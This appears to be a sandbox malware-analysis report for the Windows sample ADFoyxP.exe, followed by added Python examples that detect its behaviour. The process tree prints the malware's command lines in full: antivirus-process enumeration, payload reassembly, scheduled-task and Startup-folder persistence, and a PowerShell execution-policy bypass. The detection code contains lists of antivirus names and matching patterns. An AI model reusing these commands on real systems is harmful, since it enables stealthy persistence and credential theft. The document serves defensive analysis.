Windows Analysis Report
ADFoyxP.exe

Overview

General Information

Sample name:ADFoyxP.exe
Analysis ID:1631942
MD5:45c1abfb717e3ef5223be0bfc51df2de
SHA1:4c074ea54a1749bf1e387f611dea0d940deea803
SHA256:b01d928331e2b87a961b1a5953bc7dbb8d757c250f1343d731e3b6bb20591243

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Found strings related to Crypto-Mining
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Publisher Attachment File Dropped In Suspicious Location
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • ADFoyxP.exe (PID: 2068 cmdline: "C:\Users\user\Desktop\ADFoyxP.exe" MD5: 45C1ABFB717E3EF5223BE0BFC51DF2DE)
    • cmd.exe (PID: 5876 cmdline: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • expand.exe (PID: 708 cmdline: expand Go.pub Go.pub.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
      • tasklist.exe (PID: 5724 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3068 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7848 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7832 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6892 cmdline: cmd /c md 353090 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7388 cmdline: extrac32 /Y /E Really.pub MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 3536 cmdline: findstr /V "posted" Good MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7508 cmdline: cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 8908 cmdline: cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Seat.com (PID: 7468 cmdline: Seat.com m MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 6580 cmdline: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • schtasks.exe (PID: 5724 cmdline: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
        • cmd.exe (PID: 7660 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • RegAsm.exe (PID: 2584 cmdline: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • cmd.exe (PID: 8300 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • powershell.exe (PID: 8416 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • curcuma.exe (PID: 8696 cmdline: "C:\Users\user\AppData\Local\Temp\curcuma.exe" MD5: 38C5F131B71B5FDC82CFBA091A2D34A0)
                • chrome.exe (PID: 8680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: BB7C48CDDDE076E7EB44022520F40F77)
                  • chrome.exe (PID: 1840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2184,i,15394741629772577023,2250770724390570129,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2204 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
                • msedge.exe (PID: 2312 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
                  • msedge.exe (PID: 2796 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,7206107532581912577,15538010115052324354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
      • choice.exe (PID: 696 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 8432 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • TradeHub.com (PID: 7688 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 2376 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • TradeHub.com (PID: 1980 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • msedge.exe (PID: 2388 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • msedge.exe (PID: 5252 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • identity_helper.exe (PID: 2824 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)
    • identity_helper.exe (PID: 6840 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ParentCommandLine: Seat.com m, ParentImage: C:\Users\user\AppData\Local\Temp\353090\Seat.com, ParentProcessId: 7468, ParentProcessName: Seat.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ProcessId: 2584, ProcessName: RegAsm.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6580, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 5724, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8300, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , ProcessId: 8416, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1352, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 8432, ProcessName: wscript.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ParentCommandLine: Seat.com m, ParentImage: C:\Users\user\AppData\Local\Temp\353090\Seat.com, ParentProcessId: 7468, ParentProcessName: Seat.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ProcessId: 2584, ProcessName: RegAsm.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\ADFoyxP.exe, ProcessId: 2068, TargetFilename: C:\Users\user\AppData\Local\Temp\Argentina.pub
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6580, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 5724, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1352, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 8432, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8300, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , ProcessId: 8416, ProcessName: powershell.exe
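
The Sigma matches above and the process tree they were raised on contain enough to write a host-level detection for this chain. What follows is an added example for this page, not Joe Sandbox or Sigma project code: it turns the behaviours reported here (findstr run over tasklist output for AV process names, copy /b reassembly of a payload from fragments, a schtasks /create whose action is wscript //B, a file dropped in the Startup folder, RegAsm.exe running from Temp, powershell ExecutionPolicy Bypass, and wscript executing a .js from AppData in batch mode) into checks over hand-constructed event records whose command lines are copied from the tree. The Sysmon-style field names and the two benign control records at the end are the example's own assumptions.

```python
"""Checks for the behaviours this report flags, over constructed event records.

Added example for this page, not Joe Sandbox or Sigma project code. EVENTS is
hand-built from the command lines in the process tree; the field names mimic
Sysmon (Image, CommandLine, ParentImage, TargetFilename) but nothing here reads
a real log. The last two records are benign controls (assumed).
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# The eight process names the sample's two findstr invocations look for.
AV_PROCESS_NAMES = {"bdservicehost", "avastui", "avgui", "nswscsvc", "ekrn",
                    "sophoshealth", "opssvc", "wrsa"}
DOTNET_LOLBINS = {"regasm.exe", "regsvcs.exe", "installutil.exe"}
SCRIPT_HOSTS = r"\b(wscript|cscript|mshta|powershell|rundll32|regsvr32)\b"


@dataclass
class Event:
    kind: str                 # "process" or "file"
    image: str                # full path of the executing image
    cmdline: str = ""         # process events only
    parent_image: str = ""
    target: str = ""          # created file, file events only


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def user_writable(text: str) -> bool:
    t = text.lower()
    return any(s in t for s in ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\"))


def check(ev: Event) -> list[str]:
    """Findings for one event; an empty list means nothing matched."""
    hits: list[str] = []
    cmd, img = ev.cmdline.lower(), basename(ev.image)

    if ev.kind == "file":  # "Drops script at startup location"
        if "\\start menu\\programs\\startup\\" in ev.target.lower():
            hits.append(f"startup-folder drop: {basename(ev.target)}")
        return hits

    if img == "findstr.exe":  # "Search for Antivirus process": tasklist | findstr <names>
        found = sorted(set(re.findall(r"[\w.-]+", cmd)) & AV_PROCESS_NAMES)
        if found:
            hits.append(f"AV process enumeration via findstr: {found}")

    if img == "cmd.exe" and "copy /b" in cmd:  # payload rebuilt from fragments
        parts = cmd.split("copy /b", 1)[1].count(" + ") + 1
        if parts >= 3:
            hits.append(f"copy /b concatenation of {parts} fragments")

    if img == "schtasks.exe" and "/create" in cmd:  # task whose action is a script host
        host = re.search(SCRIPT_HOSTS, cmd)
        every = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", cmd)
        if host:
            hits.append(f"scheduled task runs {host.group(1)}"
                        + (f" every {every.group(1)} min" if every else ""))

    if img in DOTNET_LOLBINS and "\\windows\\microsoft.net\\" not in ev.image.lower():
        hits.append(f"{img} executed outside the .NET framework directory")

    # This sample writes "ExecutionPolicy Bypass" without the leading dash,
    # so the pattern does not require one.
    if img in ("powershell.exe", "pwsh.exe") and re.search(r"executionpolicy\s+bypass", cmd):
        hits.append("powershell execution policy bypass")
        if "start-process" in cmd and user_writable(cmd):
            hits.append("powershell launches a binary from a user-writable path")

    if img in ("wscript.exe", "cscript.exe"):  # "WScript or CScript Dropper"
        script = re.search(r"\.(js|jse|vbs|vbe|wsf)\b", cmd)
        if script:
            msg = f"{img} runs .{script.group(1)} script"
            msg += " in batch mode (//B, errors suppressed)" if "//b" in cmd else ""
            msg += " from a user-writable path" if user_writable(cmd) else ""
            hits.append(msg)
    return hits


def scan(events: list[Event]) -> dict[int, list[str]]:
    """Map event index -> findings, keeping only events that produced one."""
    return {i: h for i, ev in enumerate(events) if (h := check(ev))}


EVENTS = [  # constructed; command lines copied from the process tree
    Event("process", r"C:\Windows\SysWOW64\findstr.exe",
          r'findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"', r"C:\Windows\SysWOW64\cmd.exe"),
    Event("process", r"C:\Windows\SysWOW64\cmd.exe",
          r"cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit"
          r" + Strong + Copied + Wearing + Acquire 353090\Seat.com", r"C:\Windows\SysWOW64\cmd.exe"),
    Event("process", r"C:\Windows\SysWOW64\schtasks.exe",
          r'''schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F''',
          r"C:\Windows\SysWOW64\cmd.exe"),
    Event("file", r"C:\Windows\SysWOW64\cmd.exe",
          target=r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url"),
    Event("process", r"C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe",
          r"C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe", r"C:\Users\user\AppData\Local\Temp\353090\Seat.com"),
    Event("process", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          r"""powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'""",
          r"C:\Windows\SysWOW64\cmd.exe"),
    Event("process", r"C:\Windows\System32\wscript.exe",
          r'C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"'),
    # benign controls (assumed, not from the report)
    Event("process", r"C:\Windows\System32\findstr.exe", r'findstr /i "error" C:\logs\app.log', r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
          r'RegAsm.exe "C:\Program Files\Vendor\lib.dll"', r"C:\Windows\System32\msiexec.exe"),
]

if __name__ == "__main__":
    for i, findings in scan(EVENTS).items():
        print(f"event {i}: {basename(EVENTS[i].image)} -> {findings}")
```

Each check is narrow on purpose: RegAsm.exe is only flagged outside the .NET framework directory, findstr only when its arguments intersect the AV list, and the copy /b rule needs at least three fragments, so the two control records produce nothing. The AV list here is just the eight names this sample searches for; a production rule should be fed from the tasklist | findstr pairs actually observed in the environment rather than from one report.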

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
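
The Startup entry this sample writes is not a script but an Internet Shortcut whose URL= line points at the local TradeHub.js (the cmd /k echo ... command in the process tree); when the shell opens the shortcut at logon it hands the target to its file association, so the .url ends up starting wscript. The following is an added example for this page, not Joe Sandbox code, that parses such a file exactly as cmd's echo wrote it (quotes kept around the path, a blank before the redirection) and flags local targets with script or executable extensions. It also accepts the file:// spelling, which the report does not show; that case, the benign entry and the extension list are the example's own assumptions.

```python
"""Triage of a Startup-folder Internet Shortcut (.url) like the one this sample drops.

Added example for this page, not Joe Sandbox code. SAMPLE_URL_FILE is what the
two `echo ... >> TradeHub.url` redirections in the process tree produce: cmd's
echo keeps the quotes around the path and the blank before `>>`. The file://
case, the benign entry and the extension list are the example's own assumptions.
"""
from __future__ import annotations
import re
from urllib.parse import unquote, urlparse

SAMPLE_URL_FILE = (
    "[InternetShortcut] \r\n"
    'URL="C:\\Users\\user\\AppData\\Local\\TradeSecure Innovations\\TradeHub.js" \r\n'
)
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://intranet.example.test/portal\r\n"

# Extensions the shell will execute, or hand to a script host, when it opens
# the shortcut's target at logon (assumed list).
EXEC_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".bat", ".cmd",
            ".ps1", ".exe", ".com", ".scr", ".pif", ".lnk", ".dll", ".msi"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def parse_internet_shortcut(text: str) -> dict[str, str]:
    """Key/value pairs of the [InternetShortcut] section, quotes and padding stripped."""
    fields: dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip().strip('"')
    return fields


def local_target(url: str) -> str | None:
    """Windows path the URL resolves to if it is local (drive, UNC or file://), else None."""
    if re.match(r"^[a-zA-Z]:\\", url) or url.startswith("\\\\"):
        return url
    parsed = urlparse(url)
    if parsed.scheme == "file":
        path = unquote(parsed.path).lstrip("/")  # file:///C:/x/y -> C:/x/y
        return path.replace("/", "\\")
    return None


def triage(text: str) -> dict:
    """Parse one .url file and say whether it would launch something local."""
    fields = parse_internet_shortcut(text)
    url = fields.get("url", "")
    target = local_target(url)
    verdict: dict = {"url": url, "local_target": target, "suspicious": False, "reasons": []}
    if target is None:  # a web URL: the browser opens it, nothing runs locally
        return verdict
    name = target.rsplit("\\", 1)[-1].lower()
    ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
    if ext in EXEC_EXT:
        verdict["reasons"].append(f"target has executable or script extension {ext}")
    if any(s in target.lower() for s in USER_WRITABLE):
        verdict["reasons"].append("target lives in a user-writable directory")
    verdict["suspicious"] = bool(verdict["reasons"])
    return verdict


if __name__ == "__main__":
    for label, content in (("dropped", SAMPLE_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(label, triage(content))
```

On a live host the same function would be run over every .url in the per-user and all-users Startup folders; a shortcut whose target is a web address is left alone, one whose target is a local script in AppData is exactly what this sample plants.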

HIPS / PFW / Operating System Protection Evasion

